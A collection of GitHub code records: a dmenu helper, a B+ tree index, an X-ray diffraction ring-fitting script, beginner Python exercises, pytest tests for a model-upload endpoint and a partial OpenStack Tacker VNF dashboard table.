+{"seq_id":"21572479999","text":"from typing import Sequence\n\nimport dynmen\nfrom dynmen import Menu, MenuResult, MenuError\n\n\ndef dmenu(items: Sequence[str], active_indices: Sequence[int] = None, prompt: str = \"dmenu\") -> int:\n args: list[str] = [\"dmenu\", \"-format\", \"i\", \"-i\", \"-p\", prompt]\n if active_indices:\n args += [\"-a\", \",\".join([str(i) for i in active_indices])]\n menu: Menu = dynmen.Menu(args)\n\n try:\n result: MenuResult = menu(items)\n if result.selected is None:\n return -1\n else:\n return int(result.selected)\n except MenuError:\n return -1\n","repo_name":"cwrau/linux-config","sub_path":"config/rootfs/usr/local/bin/lib/dmenu.py","file_name":"dmenu.py","file_ext":"py","file_size_in_byte":589,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"34"} +{"seq_id":"10867520055","text":"import typing\nfrom collections import defaultdict\nfrom dataclasses import dataclass\n\n\n@dataclass\nclass DeleteResult:\n new_first: typing.Optional[int]\n condition_of_tree_valid: bool = True\n leaf: bool = False\n\n\nclass BTreeNode:\n def __init__(self, max_keys: int):\n self.children: typing.List[BTreeNode] = []\n self.keys: typing.List[int] = []\n self.values: typing.Optional[typing.List[str]] = None # None in non-leaf nodes\n self.max_keys = max_keys\n\n def insert(self, key: int, value: str) -> typing.Optional['BTreeNode']:\n for i in range(len(self.keys)):\n if self.keys[i] >= key:\n maybe_new_node = self.children[i].insert(key, value)\n insert_index = i\n break\n else:\n maybe_new_node = self.children[-1].insert(key, value)\n insert_index = len(self.children)\n\n if maybe_new_node:\n first_key = maybe_new_node.keys[0]\n self.keys.insert(insert_index, first_key)\n if insert_index < len(self.children):\n self.children = (self.children[:insert_index] + maybe_new_node.children +\n self.children[insert_index + 1:])\n else:\n self.children.pop()\n self.children.extend(maybe_new_node.children)\n\n if len(self.keys) > self.max_keys:\n mid = len(self.keys) // 2\n child_mid = (len(self.children) + 1) // 2\n left_keys, right_keys = self.keys[:mid], self.keys[mid + 1:]\n left_children, right_children = self.children[:child_mid], self.children[child_mid:]\n left_child = BTreeNode(self.max_keys)\n left_child.keys = left_keys\n left_child.children = left_children\n right_child = BTreeNode(self.max_keys)\n right_child.keys = right_keys\n right_child.children = right_children\n parent = BTreeNode(self.max_keys)\n parent.keys = [self.keys[mid]]\n parent.children = [left_child, right_child]\n return parent\n\n def delete(self, key: int) -> typing.Optional[DeleteResult]:\n # search for key to delete\n for i in range(len(self.keys)):\n if self.keys[i] > key:\n delete_res = self.children[i].delete(key)\n break\n else:\n i = len(self.keys)\n delete_res = self.children[i].delete(key)\n\n if not delete_res:\n return\n\n # we deleted from leaf, we are not a parent, we have to replace deleted element (if present) with the inorder successor\n self._replace_key_if_needed(key, delete_res.new_first)\n\n # child has not enough keys/children, so try to borrow from siblings\n if delete_res.leaf and not delete_res.condition_of_tree_valid:\n if i > 0 and self.children[i - 1]._has_enough_to_lend():\n # borrow right-most key from left child\n self.children[i].keys.insert(0, self.children[i - 1].keys.pop())\n self.children[i].values.insert(0, self.children[i - 1].values.pop())\n elif i + 1 < len(self.children) and self.children[i + 1]._has_enough_to_lend():\n # borrow left-most key from right child\n self.children[i].keys.append(self.children[i + 1].keys.pop(0))\n self.children[i].values.append(self.children[i + 1].values.pop(0))\n else:\n # we still have invalid child and have to merge\n if i > 0:\n # merge with left child\n new_keys = self.children[i - 1].keys + self.children[i].keys\n new_values = self.children[i - 1].values + self.children[i].values\n self.children[i].keys = new_keys\n self.children[i].values = new_values\n self.children[i - 1].keys = []\n self.children[i - 1].values = []\n elif i + 1 < len(self.children):\n # merge with right child\n new_keys = self.children[i].keys + self.children[i + 1].keys\n new_values = self.children[i].values + self.children[i + 1].values\n self.children[i].keys = new_keys\n self.children[i].values = new_values\n self.children[i + 1].keys = []\n self.children[i + 1].values = []\n delete_res.new_first = self._rearrange_keys_and_get_new_first()\n # try to borrow from sibling being grandfather\n if not delete_res.leaf and not delete_res.condition_of_tree_valid:\n if i > 0 and self.children[i - 1]._has_enough_to_lend():\n # borrow right-most key from left child\n self.children[i].children.insert(0, self.children[i - 1].children.pop())\n # it may happen that we need to only override the key or that we need to add a new one\n if self.children[i]._has_enough_keys():\n self.children[i].keys[0] = self.keys[i - 1]\n else:\n self.children[i].keys.insert(0, self.keys[i - 1])\n self.keys[i - 1] = self.children[i - 1].keys.pop()\n elif i + 1 < len(self.children) and self.children[i + 1]._has_enough_to_lend():\n # borrow left-most key from right child\n self.children[i].children.append(self.children[i + 1].children.pop(0))\n # it may happen that we need to only override the key or that we need to add a new one\n if self.children[i]._has_enough_keys():\n self.children[i].keys[-1] = self.keys[i]\n else:\n self.children[i].keys.append(self.keys[i])\n self.keys[i] = self.children[i + 1].keys.pop(0)\n else:\n # we still have the invalid child and have to merge\n if i > 0:\n # merge with left child\n new_children = self.children[i - 1].children + self.children[i].children\n new_keys = self.children[i - 1].keys + [self.keys.pop(i - 1)] + self.children[i].keys\n self.children[i - 1].children = new_children\n self.children[i - 1].keys = new_keys\n self.children.pop(i)\n elif i + 1 < len(self.children):\n # merge with right child\n new_children = self.children[i].children + self.children[i + 1].children\n new_keys = self.children[i].keys + [self.keys.pop(i)] + self.children[i + 1].keys\n self.children[i + 1].children = new_children\n self.children[i + 1].keys = new_keys\n self.children.pop(i)\n else:\n print(\"Impossibru...\")\n\n # we are a parent, we deleted from leaf and tried to restore the tree condition\n if delete_res.leaf:\n delete_res.condition_of_tree_valid = self.is_at_least_half_full() and all(c.is_at_least_half_full() for c in self.children)\n else:\n delete_res.condition_of_tree_valid = self.is_at_least_half_full()\n delete_res.leaf = False\n return delete_res\n\n def find(self, key: int) -> str:\n for i in range(len(self.keys)):\n if self.keys[i] > key:\n return self.children[i].find(key)\n else:\n i = len(self.keys)\n res = self.children[i].find(key)\n return res\n\n def _replace_key_if_needed(self, old: int, new: int):\n for i in range(len(self.keys)):\n if self.keys[i] == old:\n self.keys[i] = new\n break\n\n def _rearrange_keys_and_get_new_first(self) -> typing.Optional[int]:\n new_children = []\n for c in self.children:\n assert isinstance(c, BTreeNodeLeaf)\n if not c.keys:\n if c.prev:\n assert isinstance(c.prev, BTreeNodeLeaf)\n c.prev.next = c.next\n if c.next:\n assert isinstance(c.next, BTreeNodeLeaf)\n c.next.prev = c.prev\n continue\n new_children.append(c)\n self.keys = []\n self.children = new_children\n # rearrange our keys\n for i in range(1, len(self.children)):\n self.keys.append(self.children[i].keys[0])\n if self.children:\n return self.children[0].keys[0]\n return None\n\n def _has_enough_to_lend(self):\n return len(self.keys) > self.max_keys // 2\n\n def _has_enough_keys(self):\n return len(self.keys) >= self.max_keys // 2\n\n def is_at_least_half_full(self):\n return len(self.keys) >= self.max_keys // 2 and len(self.children) > self.max_keys // 2\n\n def __repr__(self):\n return str(self.keys)\n\n\nclass BTreeNodeLeaf(BTreeNode):\n def __init__(self, max_keys: int):\n super().__init__(max_keys)\n self.next: typing.Optional[BTreeNode] = None\n self.prev: typing.Optional[BTreeNode] = None\n self.values = []\n\n def insert(self, key: int, value: str) -> typing.Optional[BTreeNode]:\n for i in range(len(self.keys)):\n if self.keys[i] > key:\n self.keys.insert(i, key)\n self.values.insert(i, value)\n break\n else:\n self.keys.append(key)\n self.values.append(value)\n\n if len(self.keys) > self.max_keys:\n mid = len(self.keys) // 2\n left_keys, right_keys = self.keys[:mid], self.keys[mid:]\n left_values, right_values = self.values[:mid], self.values[mid:]\n left_child = BTreeNodeLeaf(self.max_keys)\n left_child.keys = left_keys\n left_child.values = left_values\n right_child = BTreeNodeLeaf(self.max_keys)\n right_child.keys = right_keys\n right_child.values = right_values\n\n left_child.next = right_child\n left_child.prev = self.prev\n right_child.prev = left_child\n right_child.next = self.next\n if self.prev:\n self.prev.next = left_child\n if self.next:\n self.next.prev = right_child\n\n parent = BTreeNode(self.max_keys)\n parent.keys = [self.keys[mid]]\n parent.children = [left_child, right_child]\n return parent\n\n def delete(self, key: int) -> typing.Optional[DeleteResult]:\n for i in range(len(self.keys)):\n if self.keys[i] == key:\n self.keys.pop(i)\n self.values.pop(i)\n break\n else:\n raise NoSuchKeyException(f'No key {key} found in a tree')\n\n if self.is_at_least_half_full():\n # case when after deletion b+tree condition is maintained in leaf, nothing to do more\n return DeleteResult(self.keys[0], leaf=True)\n # case when there is not enough elements in leaf after deletion\n if not self.keys:\n return DeleteResult(None, condition_of_tree_valid=False, leaf=True)\n return DeleteResult(self.keys[0], condition_of_tree_valid=False, leaf=True)\n\n def is_at_least_half_full(self):\n return len(self.keys) >= self.max_keys // 2\n\n def find(self, key: int) -> str:\n for i in range(len(self.keys)):\n if self.keys[i] == key:\n return self.values[i]\n raise NoSuchKeyException(f'No key {key} found in a tree')\n\n\n def __repr__(self):\n return str(self.keys)\n\n\nclass BTree:\n def __init__(self, max_keys: int):\n self.root = BTreeNodeLeaf(max_keys)\n self.height = 1\n\n def insert(self, key: int, value: str):\n maybe_new_root = self.root.insert(key, value)\n if maybe_new_root:\n self.root = maybe_new_root\n self.height += 1\n\n def delete(self, key: int):\n self.root.delete(key)\n if len(self.root.keys) in [0, 1] and len(self.root.children) == 1:\n self.root = self.root.children[0]\n elif not self.root.keys and not self.root.children:\n self.root = None\n\n def find(self, key: int) -> str:\n return self.root.find(key)\n\n def print(self):\n container: typing.Dict[int, typing.List[BTreeNode]] = defaultdict(list)\n self._dfs(self.root, 1, container)\n for level in sorted(container.keys()):\n for node in container[level]:\n node_keys = \"|\".join(map(str, node.keys))\n print(f'[{node_keys}]', end=' ')\n print()\n\n def print_leafs(self):\n if not self.root:\n return\n curr_node = self.root\n while curr_node.children:\n curr_node = curr_node.children[0]\n assert isinstance(curr_node, BTreeNodeLeaf)\n while curr_node:\n node_keys = \"|\".join(map(str, curr_node.keys))\n print(f'[{node_keys}]', end='->')\n curr_node = curr_node.next\n\n def get_leafs(self):\n sorted_keys = []\n if not self.root:\n return []\n curr_node = self.root\n while curr_node.children:\n curr_node = curr_node.children[0]\n assert isinstance(curr_node, BTreeNodeLeaf)\n while curr_node:\n sorted_keys.extend(curr_node.keys)\n curr_node = curr_node.next\n return sorted_keys\n\n def _dfs(self, root: BTreeNode, level: int, container: typing.Dict[int, typing.List[BTreeNode]]):\n if not root:\n return\n container[level].append(root)\n for c in root.children:\n self._dfs(c, level + 1, container)\n\n\nclass NoSuchKeyException(Exception):\n def __init__(self, msg: str):\n super().__init__(msg)\n","repo_name":"faderskd/performance-playground","sub_path":"apps/broker/b_tree_index.py","file_name":"b_tree_index.py","file_ext":"py","file_size_in_byte":13829,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"18912247497","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Feb 22 13:35:59 2017\n\n@author: dbanco02\n\"\"\"\n\n## Init\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport numpy as np\nfrom numpy.linalg import norm \nimport matplotlib.pyplot as plt\nimport os\nimport time\n\nfrom scipy.signal import argrelmax\nfrom sklearn.linear_model import Lasso\n\nimport RingImageProcessing as RingIP\nimport EllipticModels as EM\nimport DataAnalysis as DA\nimport LassoSolvers\n\n\nreload(EM)\nreload(LassoSolvers)\n\n# Data directory\ndata_dir = os.path.join('D:','CHESS_raw_data')\nout_dir = os.path.join(data_dir,'out')\n\n# Load Real Image Data\nspecimen_name = 'al7075_mlf'\nstep_names = ['initial', '1turn', '2turn', '3turn', 'unload']\ndic_files = ['dic_4536', 'dic_4537', 'dic_4538', 'dic_4539', 'dic_4540']\ndark_dirs = [ 68, 277, 485, 692, 899]\ninit_dirs = [ 68, 277, 485, 692, 899]\ndic_center = [0.16, 2.9] # sample center (mm) in vic2d coordinates \nx_range, x_num = [-6, 6], 5 # x-ray measurements, range in mm\ny_range, y_num = [-5, 5], 41 # x-ray measurements, range in mm\ndetector_dist = 3289.95 # pixels\ntrue_center = [1020.67, 1024.61] # [row, column] of detector image center in pixels (shifted by 1 for python index)\ne_rng = [-0.012, 0.012] # elastic strain range\np_rng = [-0.024, 0.024] # plastic strain range\nt_rng = [-0.036, 0.036] # total strain range\nE, G, v = 71.7, 26.9, 0.33 # elastic modulus (GPa), shear modulus (GPa), poisson's ratio\n\nring_name = 'al_311'\nradius = 370 # ring radius in pixels\ndr = 30 # half of ring width in pixels\nmin_amp = 25 # minimum acceptable peak amplitude\nvec_frac = 0.25 # fraction of peaks that must be acceptable\n\nsample = DA.Specimen(specimen_name, data_dir, out_dir,\n step_names, dic_files, dark_dirs, \n init_dirs, dic_center, \n x_range,x_num, y_range, y_num,\n detector_dist, true_center, \n e_rng, p_rng, t_rng, E, G, v) \n\nnum_theta= 2048\ndtheta = 2*np.pi/num_theta\n\nnum_rad = 2*dr\ndrad = 1\n\nimg_num = 35\nload_step = 0\nimage = sample.load_image(img_num,load_step)\n\npolar_image = np.zeros((num_rad,num_theta))\n\nfor i, r in enumerate(np.arange(radius-dr,radius+dr,1)):\n fi, theta_domain = RingIP.azimuthal_projection(image,true_center,r,0,2*np.pi-dtheta,num_theta)\n polar_image[i,:] = fi\n\nplt.figure(1)\nplt.imshow(polar_image,cmap='jet',vmin=0,vmax=200, interpolation='nearest')\nplt.figure(2)\nplt.imshow(image,cmap='jet',vmin=0,vmax=200, interpolation='nearest')\n\n# Success\n\n\n# Create fitting matrix \nreload(EM)\nnum_var_t = 15\nnum_var_r = 10\nvar_theta = np.linspace((dtheta),(np.pi/32),num_var_t)**2\nvar_rad = np.linspace(drad,3,num_var_r)**2\n\n# Generate unshifted basis function for each variance combination\n\n#Store stack of image slices\nB0_stack = np.zeros((num_rad,num_theta,num_var_t,num_var_r))\nfor t in range(num_var_t):\n for r in range(num_var_r):\n m_r = 0\n m_theta = 0\n B0 = EM.gaussian_basis_wrap_2D(num_theta,dtheta, m_theta, var_theta[t], \n num_rad, drad, m_r, var_rad[r]).reshape((num_rad,num_theta))\n B0_stack[:,:,t,r] = B0 \n\nB0_stack_ft = np.zeros(B0_stack.shape)\nfor tv in range(num_var_t):\n for rv in range(num_var_r):\n B0_stack_ft[:,:,tv,rv] = np.fft.fft2(B0_stack[:,:,tv,rv]) \n\n# Fit 2D data\nl1_ratio = 1\nmax_iters = 500\n\n#plt.figure(1)\n#plt.imshow(8000*B0_stack[:,:,12,9],cmap='jet', interpolation='nearest',vmin=0,vmax=200)\n\n#summ = 0\n#for t in range(num_var_t):\n# for r in range(num_var_r):\n# eigt = np.linalg.eig( np.dot(B0_stack[:,:,t,r].T,\n# B0_stack[:,:,t,r] ))\n# summ += np.max(eigt[0].real)\n# print(summ)\n# Sum was 7782.123\n \neig = np.linalg.eig( np.dot(B0_stack.reshape((num_rad*num_var_t*num_var_r,num_theta)).T,\n B0_stack.reshape((num_rad*num_var_t*num_var_r,num_theta)) ))\nL = np.max(eig[0].real)*num_rad*num_theta/1200\n \nprint('Circulant FISTA 2D')\nx_hat, times = LassoSolvers.fista_circulant_2D_Parallel(B0_stack, polar_image, \n L, l1_ratio, max_iters, \n positive=1, benchmark=1,verbose=1) \n\ny_hat = LassoSolvers.Ax_ft_2D(B0_stack_ft,x_hat)\n\n# Result Error\nerror = norm(y_hat-polar_image)/norm(polar_image)\nprint(error)\n\n# Result Sparsity \npos_coef = np.sum(x_hat>0)\ntot_coef = len(x_hat.ravel())\nsparsity0 = pos_coef/tot_coef\none_coef = np.sum(x_hat>1)\nsparsity1 = one_coef/tot_coef\nprint('x > 0 | x > 1 | total x')\nprint(str(pos_coef) + ' | ' + str(one_coef) + ' | ' + str(tot_coef))\nprint(str(sparsity0) + ' | ' + str(sparsity1))\n\nplt.figure(1)\nplt.imshow(y_hat,cmap='jet', interpolation='nearest',vmin=0,vmax=200)\n\nplt.figure(2)\nplt.imshow(polar_image,cmap='jet', interpolation='nearest',vmin=0,vmax=200)\n\"\"\"\ndata_out_dir = os.path.join('E:','CHESS_data')\nnp.save(os.path.join(data_out_dir,'result_2D_500_12.npy'),\n (x_hat, times, y_hat, polar_image,\n var_theta,var_rad,L,l1_ratio,max_iters))\n\"\"\"\n\n#%% Load and view results of previously completed trials \ndata_out_dir = os.path.join('E:','CHESS_data')\nprint_file = os.path.join(data_out_dir,'result_2D_800_7.npy')\nx_hat, times, y_hat, polar_image, var_theta,var_rad,L,l1_ratio,max_iters = np.load(print_file)\n\ny_hat = LassoSolvers.Ax_ft_2D(B0_stack_ft,x_hat)\n\n# Result Error\nerror = norm(y_hat-polar_image)/norm(polar_image)\nprint('Error: ' + str(error))\n\n# Result Sparsity \npos_coef = np.sum(x_hat>0)\ntot_coef = len(x_hat.ravel())\nsparsity0 = pos_coef/tot_coef\none_coef = np.sum(x_hat>1)\nsparsity1 = one_coef/tot_coef\nprint('x > 0 | x > 1 | total x')\nprint(str(pos_coef) + ' | ' + str(one_coef) + ' | ' + str(tot_coef))\nprint(str(sparsity0) + ' | ' + str(sparsity1))\nprint('L: ' +str(L))\nprint('l1_ratio: '+ str(l1_ratio))\nprint('max_iters: ' +str(max_iters))\nprint('var_theta: '+ str(var_theta[-1]))\nprint('var_rad: '+ str(var_rad[-1]))\nprint('time: '+ str(times))\n\nplt.figure(1)\nplt.imshow(y_hat,cmap='jet', interpolation='nearest',vmin=0,vmax=200)\n\nplt.figure(2)\nplt.imshow(polar_image,cmap='jet', interpolation='nearest',vmin=0,vmax=200)\n","repo_name":"ZHURUNZE000/CHESS-Research","sub_path":"ringFit_2D_test.py","file_name":"ringFit_2D_test.py","file_ext":"py","file_size_in_byte":6664,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"27137323227","text":"#Escreva um programa que tenha uma função chamada escreva(), que receba um texto qualquer como parâmetro\r\n# e mostre uma mensagem com tamanho adaptável aos tamanho do texto. Faça isso quantas vezes o usuário quiser.\r\n\r\ndef escreva(txt):\r\n t = len(txt) + 4\r\n print('#' * 30)\r\n print(f\"{txt:^{t}}\")\r\n print('#' * 30)\r\n\r\ndef invalida():\r\n txt = 'Erroooouuu!!!'\r\n t = len(txt) + 6\r\n print(f\"\\033[31m{txt:^{t}}\\033[m\")\r\n\r\nwhile True:\r\n msg = str(input('Por favor, digite sua mensagem: ')).strip()\r\n escreva(msg)\r\n\r\n r = str(input('Deseja continuar [S/N]? ')).upper().strip()\r\n while r not in 'SN':\r\n invalida()\r\n r = str(input('Deseja continuar [S/N]? ')).upper().strip()\r\n if r == 'N':\r\n break\r\n\r\nprint(\"> Terminou! <\")\r\n\r\n","repo_name":"NicolasCGularte/Python","sub_path":"Aula013Ex002.py","file_name":"Aula013Ex002.py","file_ext":"py","file_size_in_byte":782,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"6910452043","text":"goal = 10000\ntotal = 0\nreached_goal = False\nwhile reached_goal is False:\n command = input()\n if command == \"Going home\":\n steps = int(input())\n total += steps\n if total >= goal:\n reached_goal = True\n break\n else:\n command = int(command)\n total += command\n if total >= goal:\n reached_goal = True\ndiff = abs(total - goal)\nif reached_goal is True:\n print(\"Goal reached! Good job!\")\n print(f\"{diff} steps over the goal!\")\nelse:\n print(f\"{diff} more steps to reach goal.\")\n\n\n\n\n\n","repo_name":"radostinnikolov/SoftUni-homeworks-and-projects","sub_path":"basics/while_loops/walking.py","file_name":"walking.py","file_ext":"py","file_size_in_byte":554,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"23234719734","text":"#!/usr/bin/env python3\r\n# -*- coding: utf-8 -*-\r\n# @Time : 2022/05/04 00:51\r\n# @Author : Xiaoquan Xu\r\n# @File : 16_test.py\r\n\r\n# Test 16.Set a default model to the cloud\r\n# `PUT /model/base`\r\n\r\nimport os\r\nimport pytest\r\nimport random\r\nimport requests\r\nfrom names import *\r\nfrom simdev import *\r\n\r\nos.chdir(os.path.dirname(os.path.abspath(__file__)))\r\n\r\ndef generate_url():\r\n return API_BASE + \"/model/base\"\r\n\r\ndef log_in_session() -> requests.Session:\r\n s = requests.Session()\r\n body = {\"username\": USERNAME, \"password\": PASSWORD}\r\n s.post(API_BASE + \"/session\", json=body)\r\n return s\r\n \r\ndef generate_file(name: str):\r\n with open(name, \"w\") as f:\r\n for _ in range(10):\r\n f.write(str(random.randint(1,1000000))+\"\\n\")\r\n\r\ndef hash_content(content):\r\n with open(\"_tmp\", \"wb\") as f:\r\n f.write(content)\r\n h = hash_file(\"_tmp\")\r\n os.remove(\"_tmp\")\r\n return h\r\n\r\ndef test_good_set():\r\n s = log_in_session()\r\n url = generate_url()\r\n fname = \"f1.233\"\r\n generate_file(fname)\r\n files = {\"model\": (\"file1\", open(fname, \"rb\"))}\r\n res = s.put(url, files=files)\r\n h1 = hash_file(fname)\r\n os.remove(fname)\r\n assert res.status_code == 404\r\n \r\n # simd = SimDevice()\r\n # ts = requests.get(API_BASE + \"/timestamp\").text\r\n # head = {\"Authorization\": simd.ticket(ts)}\r\n # res = requests.get(API_BASE + \"/device/\" + str(simd.id) + \"/model\", headers=head)\r\n # assert \"Last-Modified\" not in res.headers\r\n # assert hash_content(res.content) == h1\r\n # assert res.status_code == 200\r\n\r\ndef test_interesting_request():\r\n s = log_in_session()\r\n url = generate_url()\r\n files = {\"model\": (\"file1\", \"file2\")}\r\n res = s.put(url, files=files)\r\n assert res.status_code == 404\r\n\r\ndef test_interesting_request2():\r\n s = log_in_session()\r\n url = generate_url()\r\n files = {\"model\": \"file1\"}\r\n res = s.put(url, files=files)\r\n assert res.status_code == 404\r\n\r\ndef test_bad_request():\r\n s = log_in_session()\r\n url = generate_url()\r\n files = {\"model\": (\"balala\",)}\r\n with pytest.raises(ValueError):\r\n res = s.put(url, files=files)\r\n\r\ndef test_bad_request2():\r\n s = log_in_session()\r\n url = generate_url()\r\n files = {\"modell\": (\"file1\", \"file2\")}\r\n res = s.put(url, files=files)\r\n assert res.status_code == 404\r\n\r\nif __name__ == \"__main__\":\r\n pytest.main([\"./16_test.py\"])","repo_name":"PigeonholeDSD/cloud-platform","sub_path":"test/16_test.py","file_name":"16_test.py","file_ext":"py","file_size_in_byte":2409,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"34"} +{"seq_id":"14464553126","text":"# https://www.acmicpc.net/problem/1181\n\nn = int(input())\nwords = []\nfor _ in range(n):\n words.append(input())\nwords = list(set(words)) # 중복제거\nwords.sort() # 미리 sort 해놓으면 알파벳 순으로 정렬된 상태 유지\na = sorted(words, key = lambda x : len(x)) # 길이에 따라 정렬\nfor word in a:\n print(word)\n\n\n# https://www.acmicpc.net/problem/11650\n\nn = int(input())\npoints = []\nfor _ in range(n):\n a,b = map(int,input().split())\n points.append([a,b])\nans = sorted(points, key = lambda x: (x[0],x[1]))\nfor i in range(n): \n print(ans[i][0],ans[i][1])","repo_name":"minchan1/one-step-a-day","sub_path":"baekjoon/0207.py","file_name":"0207.py","file_ext":"py","file_size_in_byte":591,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"36612840157","text":"from django.http import Http404\nfrom django.utils.translation import gettext_lazy as _\nfrom django.utils.translation import ngettext_lazy\nfrom django.utils.translation import pgettext_lazy\n\nfrom horizon import messages\nfrom horizon import tables\n\nfrom openstack_dashboard import policy\nfrom tacker_horizon.openstack_dashboard import api\nfrom tackerclient.common.exceptions import NotFound\n\n\nclass VNFManagerItem(object):\n def __init__(self, name, description, vnfs, vim, status,\n stack_status, stack_id, error_reason):\n self.name = name\n self.description = description\n self.vnfs = vnfs\n self.vim = vim\n self.status = status\n self.stack_status = stack_status\n self.id = stack_id\n self.error_reason = error_reason\n\n\nclass VNFManagerItemList(object):\n VNFLIST_P = []\n\n @classmethod\n def get_obj_given_stack_id(cls, vnf_id):\n for obj in cls.VNFLIST_P:\n if obj.id == vnf_id:\n return obj\n\n @classmethod\n def add_item(cls, item):\n cls.VNFLIST_P.append(item)\n\n @classmethod\n def clear_list(cls):\n cls.VNFLIST_P = []\n\n\nclass MyFilterAction(tables.FilterAction):\n name = \"myfilter\"\n\n\nclass StacksUpdateRow(tables.Row):\n ajax = True\n\n def can_be_selected(self, datum):\n return datum.status != 'DELETE_COMPLETE'\n\n def get_data(self, request, stack_id):\n try:\n stack = api.heat.stack_get(request, stack_id)\n if stack.stack_status == 'DELETE_COMPLETE':\n # returning 404 to the ajax call removes the\n # row from the table on the ui\n raise Http404\n item = VNFManagerItemList.get_obj_given_stack_id(stack_id)\n item.status = stack.status\n item.stack_status = stack.stack_status\n return item\n except Http404:\n raise\n except Exception as e:\n messages.error(request, e)\n raise\n\n\nclass VNFUpdateRow(tables.Row):\n ajax = True\n\n def can_be_selected(self, datum):\n return datum.status != 'DELETE_COMPLETE'\n\n def get_data(self, request, vnf_id):\n try:\n # stack = api.heat.stack_get(request, stack_id)\n # if stack.stack_status == 'DELETE_COMPLETE':\n # returning 404 to the ajax call removes the\n # row from the table on the ui\n # raise Http404\n item = VNFManagerItemList.get_obj_given_stack_id(vnf_id)\n vnf_instance = api.tacker.get_vnf(request, vnf_id)\n\n if not vnf_instance and not item:\n # TODO(NAME) - bail with error\n return None\n\n if not vnf_instance and item:\n # API failure, just keep the current state\n return item\n\n vnf = vnf_instance['vnf']\n try:\n vnf_services_str = vnf['attributes']['service_type']\n except KeyError:\n vnf_services_str = \"\"\n try:\n vnf_desc_str = vnf['description']\n except KeyError:\n vnf_desc_str = \"\"\n\n vim = vnf['placement_attr'].get('vim_name', '')\n if not item:\n # Add an item entry\n item = VNFManagerItem(vnf['name'], vnf_desc_str,\n vnf_services_str, str(vim),\n vnf['status'], vnf['status'], vnf['id'],\n vnf['error_reason'])\n else:\n item.description = vnf_desc_str\n item.vnfs = vnf_services_str\n item.status = vnf['status']\n item.stack_status = vnf['status']\n return item\n except (Http404, NotFound):\n raise Http404\n except Exception as e:\n messages.error(request, e)\n raise\n\n\nclass DeleteVNF(policy.PolicyTargetMixin, tables.DeleteAction):\n @staticmethod\n def action_present(count):\n return ngettext_lazy(\n \"Terminate VNF\",\n \"Terminate VNFs\",\n count\n )\n\n @staticmethod\n def action_past(count):\n return ngettext_lazy(\n \"Terminate VNF\",\n \"Terminate VNFs\",\n count\n )\n\n def action(self, request, obj_id):\n api.tacker.delete_vnf(request, obj_id)\n\n\nclass DeployVNF(tables.LinkAction):\n name = \"deployvnf\"\n verbose_name = _(\"Deploy VNF\")\n classes = (\"ajax-modal\",)\n icon = \"plus\"\n url = \"horizon:nfv:vnfmanager:deployvnf\"\n\n\nclass VNFManagerTable(tables.DataTable):\n STATUS_CHOICES = (\n (\"ACTIVE\", True),\n (\"ERROR\", False),\n )\n STACK_STATUS_DISPLAY_CHOICES = (\n (\"init_in_progress\", pgettext_lazy(\"current status of stack\",\n \"Init In Progress\")),\n (\"init_complete\", pgettext_lazy(\"current status of stack\",\n \"Init Complete\")),\n (\"init_failed\", pgettext_lazy(\"current status of stack\",\n \"Init Failed\")),\n (\"create_in_progress\", pgettext_lazy(\"current status of stack\",\n \"Create In Progress\")),\n (\"create_complete\", pgettext_lazy(\"current status of stack\",\n \"Create Complete\")),\n (\"create_failed\", pgettext_lazy(\"current status of stack\",\n \"Create Failed\")),\n (\"delete_in_progress\", pgettext_lazy(\"current status of stack\",\n \"Delete In Progress\")),\n (\"delete_complete\", pgettext_lazy(\"current status of stack\",\n \"Delete Complete\")),\n (\"delete_failed\", pgettext_lazy(\"current status of stack\",\n \"Delete Failed\")),\n (\"update_in_progress\", pgettext_lazy(\"current status of stack\",\n \"Update In Progress\")),\n (\"update_complete\", pgettext_lazy(\"current status of stack\",\n \"Update Complete\")),\n (\"update_failed\", pgettext_lazy(\"current status of stack\",\n \"Update Failed\")),\n (\"rollback_in_progress\", pgettext_lazy(\"current status of stack\",\n \"Rollback In Progress\")),\n (\"rollback_complete\", pgettext_lazy(\"current status of stack\",\n \"Rollback Complete\")),\n (\"rollback_failed\", pgettext_lazy(\"current status of stack\",\n \"Rollback Failed\")),\n (\"suspend_in_progress\", pgettext_lazy(\"current status of stack\",\n \"Suspend In Progress\")),\n (\"suspend_complete\", pgettext_lazy(\"current status of stack\",\n \"Suspend Complete\")),\n (\"suspend_failed\", pgettext_lazy(\"current status of stack\",\n \"Suspend Failed\")),\n (\"resume_in_progress\", pgettext_lazy(\"current status of stack\",\n \"Resume In Progress\")),\n (\"resume_complete\", pgettext_lazy(\"current status of stack\",\n \"Resume Complete\")),\n (\"resume_failed\", pgettext_lazy(\"current status of stack\",\n \"Resume Failed\")),\n (\"adopt_in_progress\", pgettext_lazy(\"current status of stack\",\n \"Adopt In Progress\")),\n (\"adopt_complete\", pgettext_lazy(\"current status of stack\",\n \"Adopt Complete\")),\n (\"adopt_failed\", pgettext_lazy(\"current status of stack\",\n \"Adopt Failed\")),\n (\"snapshot_in_progress\", pgettext_lazy(\"current status of stack\",\n \"Snapshot In Progress\")),\n (\"snapshot_complete\", pgettext_lazy(\"current status of stack\",\n \"Snapshot Complete\")),\n (\"snapshot_failed\", pgettext_lazy(\"current status of stack\",\n \"Snapshot Failed\")),\n (\"check_in_progress\", pgettext_lazy(\"current status of stack\",\n \"Check In Progress\")),\n (\"check_complete\", pgettext_lazy(\"current status of stack\",\n \"Check Complete\")),\n (\"check_failed\", pgettext_lazy(\"current status of stack\",\n \"Check Failed\")),\n )\n name = tables.Column(\"name\",\n link=\"horizon:nfv:vnfmanager:detail\",\n verbose_name=_(\"VNF Name\"))\n description = tables.Column(\"description\",\n verbose_name=_(\"Description\"))\n vnfs = tables.Column(\"vnfs\",\n verbose_name=_(\"Deployed Services\"))\n vim = tables.Column(\"vim\", verbose_name=_(\"VIM\"))\n status = tables.Column(\"status\",\n hidden=True,\n 